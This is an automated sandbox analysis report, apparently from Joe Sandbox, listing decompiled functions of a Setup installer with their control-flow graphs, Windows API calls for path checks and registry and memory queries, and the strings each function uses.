69d8fcca-69d8fccc 840->846 847 69d8fcd0-69d8fcf0 call 69dc8f0e 840->847 841->840 846->847 850 69d8fcf8-69d8fd7c call 69d86d1f call 69d897ce call 69da833e 847->850 851 69d8fcf2-69d8fcf4 847->851 858 69d8fd7e-69d8fd80 850->858 859 69d8fd84-69d8fdb2 call 69d795c1 call 69dc8f0e 850->859 851->850 858->859 864 69d8fdba-69d8fdf4 call 69d8f8cd call 69da833e 859->864 865 69d8fdb4-69d8fdb6 859->865 870 69d8fdfc-69d8fe03 call 69d790aa 864->870 871 69d8fdf6-69d8fdf8 864->871 865->864 874 69d8fe4a 870->874 875 69d8fe05-69d8fe35 call 69da833e 870->875 871->870 876 69d8fe4c-69d8fe50 874->876 884 69d8fe3d call 69d790aa 875->884 885 69d8fe37-69d8fe39 875->885 878 69d8fe61-69d8fe6b 876->878 879 69d8fe52-69d8fe5c call 69dc8f0e 876->879 882 69d8fe7c-69d8fe7e 878->882 883 69d8fe6d-69d8fe77 call 69dc8f0e 878->883 879->878 888 69d8fe80-69d8fee2 call 69da833e * 2 call 69d7838a call 69dc8f0e * 2 call 69d7a378 call 69dd14aa 882->888 889 69d8fee7-69d8ff11 call 69da833e 882->889 883->882 890 69d8fe42-69d8fe44 884->890 885->884 888->889 896 69d8ff19-69d8ff20 call 69d7917e 889->896 897 69d8ff13-69d8ff15 889->897 890->874 893 69d8fe46-69d8fe48 890->893 893->876 903 69d8ffa6 896->903 904 69d8ff26-69d8ff53 call 69da833e 896->904 897->896 908 69d8ffa8-69d8ffac 903->908 913 69d8ff5b-69d8ff62 call 69d7917e 904->913 914 69d8ff55-69d8ff57 904->914 911 69d8ffbd-69d8ffc1 908->911 912 69d8ffae-69d8ffb8 call 69dc8f0e 908->912 917 69d8ffd2-69d8ffd9 911->917 918 69d8ffc3-69d8ffcd call 69dc8f0e 911->918 912->911 913->903 930 69d8ff64-69d8ff91 call 69da833e 913->930 914->913 922 69d8ffdb-69d8ffe1 call 69dc8f0e 917->922 923 69d8ffe6-69d8ffe8 917->923 918->917 922->923 927 69d8ffea-69d9004b call 69da833e * 2 call 69d7838a call 69dc8f0e * 2 call 69d7a378 923->927 928 69d90050-69d90059 923->928 931 69d9005b-69d9005d 928->931 932 69d90061-69d90068 call 69dd6f06 928->932 942 69d8ff99-69d8ffa0 call 69d7917e 930->942 943 69d8ff93-69d8ff95 930->943 931->932 942->903 948 69d8ffa2-69d8ffa4 942->948 943->942 948->908
                                                                                                                                                                    APIs
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D8FAC4
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D8FAD6
                                                                                                                                                                      • Part of subcall function 69D7838A: __EH_prolog3.LIBCMT ref: 69D78391
                                                                                                                                                                      • Part of subcall function 69D7A378: __EH_prolog3.LIBCMT ref: 69D7A37F
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D8F8D4
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D8FEE2
                                                                                                                                                                      • Part of subcall function 69DD14AA: KiUserExceptionDispatcher.NTDLL(?,?,69DCC129,00000C00,?,?,?,?,69DCC129,00000C00,69DEBA3C,69E076D4,00000C00,00000020,69DAF845,?), ref: 69DD14EC
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Exception@8Throw$DispatcherExceptionUser
                                                                                                                                                                    • String ID: +$ActionTable$ApplicableIf$Compressed$CompressedDownloadSize$CompressedHashValue$Control$CustomErrorHandling$EstimatedInstallTime$IsPresent$Name$ParameterInfo.xml$Pause$RepairOverride$Resume$Start$Stop$UninstallOverride$schema validation failure: ServiceControl does not support Compressed attributes!$schema validation failure: ServiceControl does not support RepairOverride or UninstallOverride child elements!$schema validation failure: Only Start, Stop, Pause and Resumeare supported for 'Control' attribute.
                                                                                                                                                                    • API String ID: 2724732616-360042054
                                                                                                                                                                    • Opcode ID: 5edd397436a0ba2b27c0de58388f5bf15b37acd0e0f98e363d1495310609db87
                                                                                                                                                                    • Instruction ID: 3402739bbbf591397ef5e4edb529e2c2f0c2f9cd85877226eab1e27dc2f00430
                                                                                                                                                                    • Opcode Fuzzy Hash: 5edd397436a0ba2b27c0de58388f5bf15b37acd0e0f98e363d1495310609db87
                                                                                                                                                                    • Instruction Fuzzy Hash: ED425E71900249EFCF00DFA8C944AEDBBB8BF09318F148169F825EB691D735DA05DBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698E2B11 Relevance: 38.9, APIs: 11, Strings: 11, Instructions: 447COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 955 698e2b11-698e2ba8 call 6990265b call 698ee8e8 call 698dd65f call 698f8460 call 698ee8e8 call 698dd65f call 698dd76f call 698ee8e8 call 698f8460 974 698e2baa-698e2bac 955->974 975 698e2bb0-698e2c18 call 698f8460 call 698ee8e8 call 698dd65f call 698dd76f call 698ee8e8 call 698f8460 955->975 974->975 988 698e2c1a-698e2c1c 975->988 989 698e2c20-698e2c9b call 698f8460 call 698ee8e8 call 698dd65f call 698f8460 call 698ee8e8 call 698dd6c4 call 698dd76f 975->989 988->989 1004 698e2c9d-698e2c9f 989->1004 1005 698e2ca3-698e2cde call 698f8460 989->1005 1004->1005 1008 698e2ce1-698e2d22 call 698ee8e8 call 698dd6c4 call 698dd76f 1005->1008 1015 698e2d2a-698e2d46 call 698f8460 call 698f8199 1008->1015 1016 698e2d24-698e2d26 1008->1016 1021 698e2d4b-698e2d86 call 698ee8e8 call 698ef5fd call 698f8460 * 2 1015->1021 1022 698e2d48 1015->1022 1016->1015 1021->1008 1031 698e2d8c-698e2da4 call 698e1e75 PathIsRelativeW 1021->1031 1022->1021 1034 698e2dbb-698e2df4 call 698f83fd call 698ef21d * 2 PathFileExistsW 1031->1034 1035 698e2da6-698e2db6 PathFileExistsW 1031->1035 1061 698e2e0e-698e2e13 PathFileExistsW 1034->1061 1062 698e2df6-698e2e0b call 698eea8d call 698ef21d 1034->1062 1036 698e2e5a-698e2e5c 1035->1036 1039 698e2e5e-698e2ebb call 698dc9bb call 698dcb96 call 698f8460 call 698dd1b4 call 698fdbdb 1036->1039 1040 698e2e2c-698e2e37 PathIsRelativeW 1036->1040 1042 698e2ec0-698e2ef3 call 698f83fd call 698ef21d * 2 PathFileExistsW 1039->1042 1041 698e2e3d-698e2e47 PathFileExistsW 1040->1041 1040->1042 1045 698e2f92-698e2f94 1041->1045 1081 698e2f0d-698e2f12 PathFileExistsW 1042->1081 1082 698e2ef5-698e2f0a call 698eea8d call 698ef21d 1042->1082 1052 698e2f96-698e2fef call 698dc9bb call 698dcb96 call 698f8460 call 698dd1b4 1045->1052 1053 698e2f27-698e2f71 call 698f83fd * 2 1045->1053 1119 698e2ff7-698e2ffa 1052->1119 1079 698e3028-698e305a call 698f8460 * 2 call 698ef5a3 call 698f8460 1053->1079 1080 698e2f77-698e2f82 1053->1080 1067 698e2e4c-698e2e58 call 698f8460 1061->1067 1068 698e2e15-698e2e27 call 698eea8d call 698f8460 1061->1068 1062->1061 1067->1036 1068->1040 1122 698e305c-698e305e 1079->1122 1123 698e3062-698e3081 call 698f8460 * 2 1079->1123 1087 698e2ffc-698e2fff 1080->1087 1090 698e2f84-698e2f90 call 698f8460 1081->1090 1091 698e2f14-698e2f22 call 698eea8d call 698f8460 1081->1091 1082->1081 1098 698e3005-698e300b 1087->1098 1099 698e3093-698e30ab RaiseException 1087->1099 1090->1045 1091->1053 1098->1099 1108 698e3011-698e3026 call 698ef5fd 1098->1108 1108->1079 1108->1119 1119->1087 1122->1123 1128 698e3089-698e3090 call 69902709 1123->1128 1129 698e3083-698e3085 1123->1129 1129->1128
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 698E2B1B
                                                                                                                                                                      • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
                                                                                                                                                                      • Part of subcall function 698DD76F: __EH_prolog3.LIBCMT ref: 698DD776
                                                                                                                                                                      • Part of subcall function 698DD76F: SysFreeString.OLEAUT32(00000000), ref: 698DD7CA
                                                                                                                                                                    • PathIsRelativeW.SHLWAPI(?,00000001,?,000000FF,?,?,?,?,00000001,?,?,?,000000FF,00000088,698F6F88,?), ref: 698E2D9C
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?,?,?,?,698F2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,698EE271,00000000), ref: 698E2DAF
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000005,?,?,?,?,?,698F2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008), ref: 698E2DF0
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000005,?,?,?,698F2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,698EE271,00000000), ref: 698E2E0F
                                                                                                                                                                    • PathIsRelativeW.SHLWAPI(00000001,?,?,?,698F2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,698EE271,00000000), ref: 698E2E2F
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000001,?,?,?,698F2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,698EE271,00000000), ref: 698E2E40
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 698E2EBB
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000005,00000001,?,?,?,?,698F2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008), ref: 698E2EEF
                                                                                                                                                                      • Part of subcall function 698EF21D: PathAppendW.SHLWAPI(00000000,00000000,?,00000105,?,?,80070057,80070057,698DC3AE), ref: 698EF241
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000005,?,?,?,698F2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,698EE271,00000000), ref: 698E2F0E
                                                                                                                                                                      • Part of subcall function 698F83FD: _memcpy_s.LIBCMT ref: 698F844E
                                                                                                                                                                    • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,?,?,698F2A30,?,00000000,?,00000000,00000000,?,?,00000000), ref: 698E309C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Path$ExistsFile$H_prolog3$Relative$AppendExceptionException@8FreeRaiseStringThrow_memcpy_s
                                                                                                                                                                    • String ID: %$Caption$CreateLayout$Default$HeaderImage$Install$Repair$Uninstall$UninstallPatch$Watermark$WizardImages
                                                                                                                                                                    • API String ID: 2164894574-1575104729
                                                                                                                                                                    • Opcode ID: 4a1f7d5472177218e1f3ff34d69bf764fe8e6f637a845f7463521d9bb12d0be0
                                                                                                                                                                    • Instruction ID: ba5f847807a4064f364a77945cbb34cc7fa2eb59a6d6355ace2162b45bece006
                                                                                                                                                                    • Opcode Fuzzy Hash: 4a1f7d5472177218e1f3ff34d69bf764fe8e6f637a845f7463521d9bb12d0be0
                                                                                                                                                                    • Instruction Fuzzy Hash: F5126D7590024DEFDF00DFE8C984ADDBBB8AF16318F149959E425EB291D734DA0ACB60
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DB09E3 Relevance: 37.0, APIs: 13, Strings: 8, Instructions: 228registryCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1132 69db09e3-69db0a25 call 69dd6e8d call 69d75727 1138 69db0a3f 1132->1138 1139 69db0a27-69db0a2f GetLastError 1132->1139 1142 69db0a41-69db0a80 call 69da833e call 69db1236 call 69dc8f0e 1138->1142 1140 69db0a3b-69db0a3d 1139->1140 1141 69db0a31-69db0a36 1139->1141 1140->1142 1141->1140 1150 69db0a9a 1142->1150 1151 69db0a82-69db0a8a GetLastError 1142->1151 1154 69db0a9c-69db0ae9 call 69da833e call 69db1236 call 69dc8f0e RegOpenKeyExW 1150->1154 1152 69db0a8c-69db0a91 1151->1152 1153 69db0a96-69db0a98 1151->1153 1152->1153 1153->1154 1161 69db0aef-69db0b14 RegQueryValueExW 1154->1161 1162 69db0bc2-69db0bd9 call 69dce770 1154->1162 1163 69db0b52-69db0b5f RegCloseKey 1161->1163 1164 69db0b16-69db0b34 RegQueryValueExW 1161->1164 1170 69db0bdc-69db0be1 1162->1170 1168 69db0b61-69db0b73 1163->1168 1169 69db0bc0 1163->1169 1164->1163 1167 69db0b36-69db0b4f RegQueryValueExW 1164->1167 1167->1163 1173 69db0b8d 1168->1173 1174 69db0b75-69db0b7d GetLastError 1168->1174 1169->1162 1170->1170 1172 69db0be3-69db0bf2 GlobalMemoryStatusEx 1170->1172 1175 69db0c4f-69db0c74 call 69da833e GetLastError call 69db1236 1172->1175 1176 69db0bf4-69db0c13 1172->1176 1179 69db0b8f-69db0bbf call 69da833e call 69db1236 call 69dc8f0e 1173->1179 1177 69db0b89-69db0b8b 1174->1177 1178 69db0b7f-69db0b84 1174->1178 1193 69db0c77-69db0c8b call 69dc8f0e call 69db3439 call 69dd6f1f 1175->1193 1185 69db0c2b-69db0c4d call 69da833e call 69db1236 1176->1185 1186 69db0c15-69db0c1d GetLastError 1176->1186 1177->1179 1178->1177 1179->1169 1185->1193 1189 69db0c29 1186->1189 1190 69db0c1f-69db0c24 1186->1190 1189->1185 1190->1189
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 69DB09ED
                                                                                                                                                                      • Part of subcall function 69D75727: GetModuleHandleW.KERNEL32(kernel32.dll,?,69D75782,00000000,69DA831D), ref: 69D75731
                                                                                                                                                                      • Part of subcall function 69D75727: GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 69D75741
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 69DB0A27
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 69DB0A82
                                                                                                                                                                    • RegOpenKeyExW.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020019,?,?,00000000,?,Failed to record NumberOfProcessor), ref: 69DB0ADE
                                                                                                                                                                    • RegQueryValueExW.KERNEL32(?,~MHz,00000000,00000000,?,?), ref: 69DB0B0D
                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,~Mhz,00000000,00000000,?,?), ref: 69DB0B2D
                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,~mhz,00000000,00000000,?,?), ref: 69DB0B4D
                                                                                                                                                                    • RegCloseKey.KERNEL32(?), ref: 69DB0B55
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 69DB0B75
                                                                                                                                                                    • _memset.LIBCMT ref: 69DB0BCC
                                                                                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?,?,?,69D6A738,?,?,00000738,69DAFA6E,?,69D6A794,02602230), ref: 69DB0BEA
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000738,69DAFA6E,?,69D6A794,02602230), ref: 69DB0C15
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                    • GetLastError.KERNEL32(?,GlobalMemoryStatusEx failed,?,?,00000738,69DAFA6E,?,69D6A794,02602230), ref: 69DB0C60
                                                                                                                                                                      • Part of subcall function 69DB1236: __EH_prolog3.LIBCMT ref: 69DB123D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$QueryValue$H_prolog3$AddressCloseGlobalH_prolog3_HandleMemoryModuleOpenProcStatus_memset
                                                                                                                                                                    • String ID: Failed to record CpuArchitecture$Failed to record NumberOfProcessor$Failed to record SystemMemory$GlobalMemoryStatusEx failed$HARDWARE\DESCRIPTION\System\CentralProcessor\0$~MHz$~Mhz$~mhz
                                                                                                                                                                    • API String ID: 2659457873-2309824155
                                                                                                                                                                    • Opcode ID: 5b2b5f6555dcf1c289ee246594f0091b733bfd855325aff74e085b2ae59fcb42
                                                                                                                                                                    • Instruction ID: afd81bb78ddb21ed4bc37c84d2c0f4578b3c984aa61ee04f486c73593495525a
                                                                                                                                                                    • Opcode Fuzzy Hash: 5b2b5f6555dcf1c289ee246594f0091b733bfd855325aff74e085b2ae59fcb42
                                                                                                                                                                    • Instruction Fuzzy Hash: DF81BCB5900248EBDB20CFE4CE45F9EBBB9AF05354F208635E416EF698D730DA058B60
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DBD01E Relevance: 35.1, APIs: 3, Strings: 17, Instructions: 92COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DBD025
                                                                                                                                                                      • Part of subcall function 69D75D3F: __EH_prolog3.LIBCMT ref: 69D75D46
                                                                                                                                                                      • Part of subcall function 69D75D3F: GetModuleFileNameW.KERNEL32(69D50000,00000010,00000104,?,69DA831D,00000000), ref: 69D75D93
                                                                                                                                                                      • Part of subcall function 69DA8E4A: PathAppendW.SHLWAPI(00000000,?,?,?,?,?,69DB99FD,00000000,00000000,?,?,?,00000000,?,UiInfo.xml), ref: 69DA8E6E
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?,69D661FC,graphics,?,00000054,69DBB48A,?,?,?,?,ParameterInfo.xml,?,00000000,?,?,ParameterInfo.xml), ref: 69DBD0BE
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69DBD16E
                                                                                                                                                                      • Part of subcall function 69DA8F73: PathRemoveFileSpecW.SHLWAPI(00000000,2806C750,00000010,80004005,69D75DB8,69DAF845,00000010,?,69DA831D,00000000), ref: 69DA8F84
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FilePath$H_prolog3$AppendException@8ExistsModuleNameRemoveSpecThrow
                                                                                                                                                                    • String ID: Graphic file %s does not exists$Print.ico$Rotate1.ico$Rotate2.ico$Rotate3.ico$Rotate4.ico$Rotate5.ico$Rotate6.ico$Rotate7.ico$Rotate8.ico$Save.ico$Setup.ico$SysReqMet.ico$SysReqNotMet.ico$graphics$stop.ico$warn.ico
                                                                                                                                                                    • API String ID: 419085990-1965610755
                                                                                                                                                                    • Opcode ID: d055725c239bea74752aaea5b26e0395d750ac9722f288a36424d5cc48ad0755
                                                                                                                                                                    • Instruction ID: 0fc9655b2428e895162bb34f58e5b5bccdb01b6ee48d0b45e428a74bef18bae1
                                                                                                                                                                    • Opcode Fuzzy Hash: d055725c239bea74752aaea5b26e0395d750ac9722f288a36424d5cc48ad0755
                                                                                                                                                                    • Instruction Fuzzy Hash: FA4100B5C00259EBCB00DFE4D945BDEBBB9BF19304F908539E414BBA60C7359A098BA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D8A82C Relevance: 33.9, APIs: 2, Strings: 17, Instructions: 638COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1239 69d8a82c-69d8a854 call 69dd6e1a 1242 69d8a85c-69d8a87c call 69d86249 1239->1242 1243 69d8a856-69d8a858 1239->1243 1246 69d8a87e-69d8a880 1242->1246 1247 69d8a884-69d8a8a8 call 69d86440 1242->1247 1243->1242 1246->1247 1250 69d8a8aa-69d8a8ac 1247->1250 1251 69d8a8b0-69d8a8e4 call 69d869b7 call 69da833e 1247->1251 1250->1251 1256 69d8a8ec-69d8a90c call 69d78d44 call 69d81c2e 1251->1256 1257 69d8a8e6-69d8a8e8 1251->1257 1262 69d8a90e-69d8a910 1256->1262 1263 69d8a914-69d8a94a call 69dc8f0e call 69da833e 1256->1263 1257->1256 1262->1263 1268 69d8a94c-69d8a94e 1263->1268 1269 69d8a952-69d8a972 call 69d78d44 call 69d81d3d 1263->1269 1268->1269 1274 69d8a97a-69d8a9b0 call 69dc8f0e call 69da833e 1269->1274 1275 69d8a974-69d8a976 1269->1275 1280 69d8a9b8-69d8a9de call 69d78d44 call 69d8784c 1274->1280 1281 69d8a9b2-69d8a9b4 1274->1281 1275->1274 1286 69d8a9e0-69d8a9e2 1280->1286 1287 69d8a9e6-69d8aa1b call 69dc8f0e call 69da833e 1280->1287 1281->1280 1286->1287 1292 69d8aa1d-69d8aa1f 1287->1292 1293 69d8aa23-69d8aa48 call 69d79411 call 69d83ba9 1287->1293 1292->1293 1298 69d8aa4a-69d8aa4c 1293->1298 1299 69d8aa50-69d8aa72 call 69dc8f0e 1293->1299 1298->1299 1302 69d8aa7a-69d8aa99 call 69d86d1f 1299->1302 1303 69d8aa74-69d8aa76 1299->1303 1306 69d8aa9b-69d8aa9d 1302->1306 1307 69d8aaa1-69d8aac3 call 69d86e28 1302->1307 1303->1302 1306->1307 1310 69d8aacb-69d8aae8 call 69d870c5 call 69d897ce 1307->1310 1311 69d8aac5-69d8aac7 1307->1311 1315 69d8aaed-69d8ab73 call 69da833e 1310->1315 1311->1310 1318 69d8ab7b-69d8abc1 call 69d795c1 call 69dc8f0e call 69da833e 1315->1318 1319 69d8ab75-69d8ab77 1315->1319 1326 69d8abc9-69d8ac09 call 69d79703 call 69dc8f0e call 69da833e 1318->1326 1327 69d8abc3-69d8abc5 1318->1327 1319->1318 1334 69d8ac0b-69d8ac0d 1326->1334 1335 69d8ac11-69d8ac54 call 69d79703 call 69dc8f0e call 69da833e 1326->1335 1327->1326 1334->1335 1342 69d8ac5c-69d8ac86 call 69d79703 call 69dc8f0e 1335->1342 1343 69d8ac56-69d8ac58 1335->1343 1348 69d8ac88-69d8ac8a 1342->1348 1349 69d8ac8e-69d8aca9 call 69d789b7 1342->1349 1343->1342 1348->1349 1352 69d8acab-69d8acad 1349->1352 1353 69d8acb1-69d8acbc call 69d7922c 1349->1353 1352->1353 1356 69d8acbe-69d8ad0f call 69da833e * 2 call 69d7838a call 69dc8f0e * 2 call 69d7a378 1353->1356 1357 69d8ad22-69d8ad46 call 69da833e 1353->1357 1382 69d8ad14-69d8ad1d call 69dd14aa 1356->1382 1362 69d8ad48-69d8ad4a 1357->1362 1363 69d8ad4e-69d8ad93 call 69d79703 call 69da833e call 69d7a2b5 call 69dc8f0e * 2 1357->1363 1362->1363 1385 69d8ad95-69d8ada9 call 69d92d50 1363->1385 1386 69d8ae06-69d8ae33 call 69da833e 1363->1386 1382->1357 1391 69d8adab-69d8adb3 1385->1391 1392 69d8adbd 1385->1392 1393 69d8ae3b-69d8ae42 call 69d790aa 1386->1393 1394 69d8ae35-69d8ae37 1386->1394 1395 69d8adb9-69d8adbb 1391->1395 1396 69d8adb5-69d8adb7 1391->1396 1397 69d8adbf-69d8adcc call 69dc8f0e 1392->1397 1402 69d8ae89 1393->1402 1403 69d8ae44-69d8ae74 call 69da833e 1393->1403 1394->1393 1395->1397 1396->1392 1396->1395 1397->1386 1404 69d8adce-69d8ae01 call 69da833e * 2 call 69d7838a 1397->1404 1406 69d8ae8b-69d8ae8f 1402->1406 1412 69d8ae7c-69d8ae83 call 69d790aa 1403->1412 1413 69d8ae76-69d8ae78 1403->1413 1404->1382 1409 69d8aea0-69d8aeab 1406->1409 1410 69d8ae91-69d8ae9b call 69dc8f0e 1406->1410 1415 69d8aeb8-69d8aeba 1409->1415 1416 69d8aead-69d8aeb3 call 69dc8f0e 1409->1416 1410->1409 1412->1402 1430 69d8ae85-69d8ae87 1412->1430 1413->1412 1418 69d8aebc-69d8aefa call 69da833e * 2 call 69d7838a call 69dc8f0e 1415->1418 1419 69d8af22-69d8af2b 1415->1419 1416->1415 1449 69d8aefe-69d8af1a call 69dc8f0e call 69d7a378 1418->1449 1422 69d8af2d-69d8af6f call 69da833e * 2 call 69d7838a call 69dc8f0e 1419->1422 1423 69d8af71-69d8af7a 1419->1423 1422->1449 1431 69d8af7c-69d8af7e 1423->1431 1432 69d8af82-69d8af89 call 69dd6f06 1423->1432 1430->1406 1431->1432 1449->1419
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D8A833
                                                                                                                                                                      • Part of subcall function 69D81D3D: __EH_prolog3.LIBCMT ref: 69D81D44
                                                                                                                                                                      • Part of subcall function 69D81D3D: __CxxThrowException@8.LIBCMT ref: 69D81E11
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D8AD1D
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D7838A: __EH_prolog3.LIBCMT ref: 69D78391
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
